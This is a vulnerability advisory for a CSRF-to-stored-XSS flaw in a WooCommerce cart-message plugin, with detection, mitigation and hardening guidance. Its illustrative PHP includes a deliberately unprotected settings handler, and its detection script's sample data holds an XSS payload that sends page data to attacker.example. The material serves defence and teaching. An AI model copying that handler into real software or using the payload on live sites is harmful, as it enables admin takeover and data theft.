CVE Vulnerability Database

CVE-2025-60171: WooCommerce CSRF and Stored XSS Flaw

CVE-2025-60171 is a Cross-Site Request Forgery (CSRF) vulnerability in Conditional Cart Messages for WooCommerce that can be chained into stored Cross-Site Scripting (XSS). It affects plugin versions up to and including 1.2.10. This article covers technical details, impact, detection, and mitigation.


CVE-2025-60171 Overview

CVE-2025-60171 is a Cross-Site Request Forgery (CSRF) vulnerability in the Conditional Cart Messages for WooCommerce plugin by YourPlugins.com (yourplugins-wc-conditional-cart-notices). The flaw affects all plugin versions up to and including 1.2.10. An attacker can chain the CSRF weakness with stored Cross-Site Scripting (XSS) to inject persistent JavaScript into the WordPress administration interface. Exploitation requires tricking an authenticated administrator into visiting a crafted page or link.

Critical Impact

A successful attack stores attacker-controlled JavaScript in the WooCommerce site. Because WordPress sets its authentication cookies HttpOnly, the payload normally cannot read the session cookie directly; instead it rides the victim's authenticated session, issuing requests from the victim's browser to create administrator accounts, install plugins, or change settings, and can also capture credentials or tokens entered on the page. The net effect is administrative account takeover and arbitrary actions performed in the victim's browser context.

Affected Products

  • Conditional Cart Messages for WooCommerce – YourPlugins.com (yourplugins-wc-conditional-cart-notices)
  • All versions from initial release through 1.2.10
  • WordPress sites running WooCommerce with this plugin installed

Discovery Timeline

  • 2025-09-26 - CVE-2025-60171 published to NVD
  • 2026-04-28 - Last updated in NVD database

Technical Details for CVE-2025-60171

Vulnerability Analysis

The plugin exposes state-changing administrative endpoints that do not verify that a request was deliberately submitted from the plugin's own settings page, i.e. no WordPress nonce or referer check. The issue is classified under CWE-352: Cross-Site Request Forgery. Because the affected handlers also fail to sanitize input before storing it, an attacker can use the CSRF primitive to plant persistent XSS payloads in plugin-managed settings such as cart notice messages.

When an authenticated WordPress administrator visits an attacker-controlled page, the browser automatically submits a forged request to the vulnerable endpoint using the administrator's session cookies. The plugin processes the request as legitimate and persists the attacker-supplied content. Any subsequent visit to a page rendering that content executes the stored script in the visitor's browser.

Root Cause

The vulnerability stems from missing CSRF protection on plugin settings handlers. WordPress provides nonce primitives such as wp_nonce_field() and check_admin_referer(), but the affected endpoints in versions up to 1.2.10 do not enforce these checks. The absence of output encoding on the stored values compounds the issue and enables the stored XSS chain.
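To make the root cause concrete, here is an added illustration written for this article, not code from the plugin or from the Patchstack advisory: a minimal WordPress settings handler exhibiting the two defects described above (no nonce or capability check, unfiltered storage and output), followed by the hardened equivalent using the nonce primitives the paragraph names. The function, option and action names (ccm_demo_*) are hypothetical; the WordPress API calls (wp_nonce_field, check_admin_referer, current_user_can, wp_kses_post) are real.

```php
<?php
/**
 * Added illustration (not the plugin's code) of the handler pattern behind a
 * CWE-352 -> stored XSS chain on a WordPress settings page, and its fix.
 * Option, action and function names (ccm_demo_*) are hypothetical.
 */

// --- Vulnerable pattern: no nonce, no capability check, raw storage. ---
// Any POST carrying notice_message is persisted, so a hidden cross-site form
// auto-submitted by a logged-in admin's browser writes attacker HTML.
function ccm_demo_save_notice_vulnerable() {
    if ( isset( $_POST['notice_message'] ) ) {
        update_option( 'ccm_demo_notice', $_POST['notice_message'] ); // unsanitized
    }
}

// Output side: echoing the stored value verbatim turns the write into stored XSS
// for every visitor who sees the notice.
function ccm_demo_render_notice_vulnerable() {
    echo '<div class="woocommerce-info">' . get_option( 'ccm_demo_notice', '' ) . '</div>';
}

// --- Hardened pattern. ---
function ccm_demo_settings_form() {
    echo '<form method="post">';
    // Emits a hidden _wpnonce field bound to this action and the current user's
    // session (plus a _wp_http_referer field). A third-party page cannot obtain
    // a valid value, so a forged request fails check_admin_referer() below.
    wp_nonce_field( 'ccm_demo_save_notice' );
    echo '<textarea name="notice_message"></textarea>';
    submit_button();
    echo '</form>';
}

function ccm_demo_save_notice_hardened() {
    if ( ! isset( $_POST['notice_message'] ) ) {
        return;
    }
    // Authorization: only users allowed to manage WooCommerce settings.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // CSRF: dies with a 403 page unless _wpnonce is valid for this action.
    check_admin_referer( 'ccm_demo_save_notice' );
    // Input filtering: keep only the HTML tags allowed in post content;
    // <script>, on* event handlers and javascript: URLs are removed.
    $message = wp_kses_post( wp_unslash( $_POST['notice_message'] ) );
    update_option( 'ccm_demo_notice', $message );
}

// Output side: filter again on output so a value written by any other code
// path (import, old version, direct DB edit) cannot execute either.
function ccm_demo_render_notice_hardened() {
    echo '<div class="woocommerce-info">' . wp_kses_post( get_option( 'ccm_demo_notice', '' ) ) . '</div>';
}
```

The order matters less than the presence of all three controls: the capability check answers "may this user do this at all", the nonce check answers "did this user intend this request", and the kses filtering on both write and read closes the XSS half of the chain independently of the CSRF fix.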

Attack Vector

The attack is network-based and requires user interaction. An attacker hosts a page containing a hidden form or fetch() call that targets the vulnerable plugin endpoint on the victim site. The attacker then social-engineers a logged-in administrator into loading that page. The forged request writes attacker-controlled JavaScript into the plugin's stored notice configuration. The payload then executes whenever the cart notice renders, achieving cross-context script execution with the privileges of any user who views the affected page.

No verified public proof-of-concept code is available. Refer to the Patchstack Vulnerability Report for additional advisory details.

Detection Methods for CVE-2025-60171

Indicators of Compromise

  • Unexpected <script> tags, event handlers, or obfuscated JavaScript inside WooCommerce cart notice configuration entries stored by yourplugins-wc-conditional-cart-notices.
  • Administrative POST requests to plugin endpoints carrying an off-site Referer header. Note that standard access logs record the Referer but not the POST body, so a missing or invalid nonce is only visible in application-level logging or a WAF that inspects request bodies.
  • New or modified administrator accounts, plugin installations, or option changes following an admin session.

Detection Strategies

  • Audit the wp_options table and plugin-specific tables for entries containing HTML or script content within cart notice fields.
  • Review web server access logs for POST requests to /wp-admin/admin.php or admin-post.php from off-domain referrers, filtering on the plugin slug where it appears in the query string (for example the page= parameter of admin.php).
  • Compare the installed plugin version against 1.2.10 and flag any site running an affected build.
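The first two audit steps above, as an added example rather than anything shipped with the plugin or the advisory: a stand-alone PHP script that scans an options array for active-content markers and scans Combined Log Format access-log lines for POSTs to the admin endpoints whose Referer is off-site or absent. The option name ccm_demo_notices, the page slug ccm-settings, the host names and every log line are constructed sample data; on a real site you would feed it the plugin's actual option values (for example exported with wp option get) and your own logs.

```php
<?php
/**
 * Added detection helper (not from the advisory or the plugin). Scans
 * (a) option values for script-bearing HTML and (b) access-log lines for
 * POSTs to WordPress admin endpoints with an off-site or missing Referer.
 * All sample data below is constructed; option and slug names are hypothetical.
 */

// Markers of active content inside a notice that should be static HTML.
// Tune for your site: entity-encoded or split payloads are not covered.
const CCM_SCRIPT_MARKERS = array(
    '/<\s*script\b/i',                    // <script ...>
    '/\bon[a-z]+\s*=/i',                  // onerror=, onload=, onmouseover= ...
    '/javascript\s*:/i',                  // javascript: URLs in href/src
    '/<\s*(iframe|object|embed|svg)\b/i', // other script-capable elements
);

// Plugin settings are usually serialized arrays; flatten to one string.
function ccm_flatten( $value ) {
    if ( is_array( $value ) ) {
        return implode( "\n", array_map( 'ccm_flatten', $value ) );
    }
    return (string) $value;
}

// Return the names of options whose (flattened) value matches any marker.
function ccm_find_script_in_options( array $options ) {
    $hits = array();
    foreach ( $options as $name => $value ) {
        $text = ccm_flatten( $value );
        foreach ( CCM_SCRIPT_MARKERS as $re ) {
            if ( preg_match( $re, $text ) ) {
                $hits[] = $name;
                break;
            }
        }
    }
    return $hits;
}

// Parse Combined Log Format lines and bucket POSTs to the admin endpoints:
// 'offsite'    = Referer host differs from the site host (strong CSRF signal)
// 'no_referer' = Referer is "-" (weaker: some browsers/policies strip it)
function ccm_find_offsite_admin_posts( array $lines, $site_host ) {
    $log_re   = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"/';
    $endpoint = '#^/wp-admin/(admin\.php|admin-post\.php|options\.php)(\?|$)#';
    $result   = array( 'offsite' => array(), 'no_referer' => array() );
    foreach ( $lines as $line ) {
        if ( ! preg_match( $log_re, $line, $m ) ) {
            continue; // not a recognisable log line
        }
        $method  = $m[3];
        $path    = $m[4];
        $referer = $m[6];
        if ( $method !== 'POST' || ! preg_match( $endpoint, $path ) ) {
            continue;
        }
        $ref_host = parse_url( $referer, PHP_URL_HOST );
        if ( $referer === '-' || $ref_host === null ) {
            $result['no_referer'][] = $line;
        } elseif ( strcasecmp( $ref_host, $site_host ) !== 0 ) {
            $result['offsite'][] = $line;
        }
    }
    return $result;
}

// Constructed sample: a plugin option array with one poisoned notice.
$sample_options = array(
    'ccm_demo_notices' => array( // hypothetical option name
        array( 'condition' => 'cart_total_gt_50', 'message' => 'Free shipping on orders over $50!' ),
        array( 'condition' => 'always', 'message' => '<img src=x onerror="fetch(\'//attacker.example/?\'+document.title)">' ),
    ),
    'blogname' => 'Example Shop',
);

// Constructed sample access-log lines (Combined Log Format).
$sample_log = array(
    '203.0.113.5 - - [26/Sep/2025:10:01:02 +0000] "POST /wp-admin/admin.php?page=ccm-settings HTTP/1.1" 302 0 "https://attacker.example/lure.html" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Sep/2025:10:02:03 +0000] "POST /wp-admin/admin.php?page=ccm-settings HTTP/1.1" 302 0 "https://shop.example/wp-admin/admin.php?page=ccm-settings" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Sep/2025:10:03:04 +0000] "GET /wp-admin/admin.php?page=ccm-settings HTTP/1.1" 200 5120 "https://attacker.example/" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Sep/2025:10:04:05 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
);

print_r( ccm_find_script_in_options( $sample_options ) );
$flagged = ccm_find_offsite_admin_posts( $sample_log, 'shop.example' );
printf( "off-site admin POSTs: %d, admin POSTs without Referer: %d\n",
    count( $flagged['offsite'] ), count( $flagged['no_referer'] ) );
foreach ( $flagged['offsite'] as $line ) {
    echo $line, "\n";
}
```

Run it with php on the command line. In the sample, the second notice is flagged by the on*= marker, the first log line is reported as an off-site POST, the second (same-origin Referer) and third (a GET) are ignored, and the fourth lands in the weaker no_referer bucket. Keep the two buckets separate when alerting: a missing Referer alone is common enough on real traffic that it should lower the alert priority rather than block.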

Monitoring Recommendations

  • Enable a web application firewall ruleset that inspects WordPress admin POST requests for a missing nonce parameter. A WAF cannot verify that a nonce is valid, since validity depends on the WordPress secret keys and the user's session, and plugins may use a parameter name other than _wpnonce, so treat this as a presence check and expect some tuning.
  • Forward WordPress and webserver logs to a centralized analytics platform and alert on anomalous administrator-initiated configuration changes.
  • Monitor browser-side errors and Content Security Policy (CSP) violation reports for unexpected inline script execution on storefront pages.

How to Mitigate CVE-2025-60171

Immediate Actions Required

  • Update Conditional Cart Messages for WooCommerce to a version later than 1.2.10 as soon as the vendor publishes a fix.
  • If no patched version is available, deactivate and remove the plugin until remediation is released.
  • If exploitation is suspected, force a password reset and invalidate active sessions for all WordPress administrator accounts on affected sites, and review the user list, installed plugins and recently changed options for changes made from an administrator session.

Patch Information

The advisory tracked by the Patchstack Vulnerability Report covers all versions up to and including 1.2.10. Site administrators should monitor the YourPlugins.com vendor channel and the WordPress.org plugin page for an updated release that introduces CSRF nonce validation and input sanitization on the affected handlers.

Workarounds

  • Restrict /wp-admin/ access by source IP at the reverse proxy or firewall layer to reduce CSRF exposure.
  • Deploy a WAF rule that rejects WordPress admin POST requests carrying an off-site Referer or lacking a nonce parameter. Nonce validity cannot be checked at the WAF, so this blocks only the simplest forged requests, and the parameter name must be tuned to what the plugin's forms actually send.
  • Enforce a Content Security Policy that disallows inline scripts on storefront pages to limit stored XSS impact. WordPress themes and WooCommerce itself rely on inline scripts, so roll this out in report-only mode first and move to enforcement only once the violation reports are clean.
  • Instruct administrators to use a separate browser profile for WordPress administration and to log out of admin sessions when not in use.
Example nginx configuration for the Referer check above. nginx does not allow one if block inside another, so the method and Referer decisions are made in map directives (which belong in the http block) and the location uses a single if with return:

```nginx
# Block POSTs to WordPress admin endpoints whose Referer is absent or off-site.
map $http_referer $wp_admin_offsite_ref {
    default                                 1;   # no Referer, or another site
    "~*^https?://your-site\.example(/|$)"   0;   # same-site Referer
}
map "$request_method:$wp_admin_offsite_ref" $wp_admin_block {
    default  0;
    "POST:1" 1;   # only POSTs with an off-site/missing Referer are blocked
}

location ~ ^/wp-admin/(admin\.php|admin-post\.php|options\.php)$ {
    if ($wp_admin_block) { return 403; }
    # Repeat the fastcgi_pass/include directives from your existing PHP
    # location here; otherwise this block serves nothing for valid requests.
}
```

WordPress sends a same-origin Referer on its own admin forms, so normal administration passes. Clients or extensions that strip the Referer will be blocked by this rule; if that affects your administrators, restrict it to the plugin's own admin page or fall back to the IP allow-list workaround above.

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
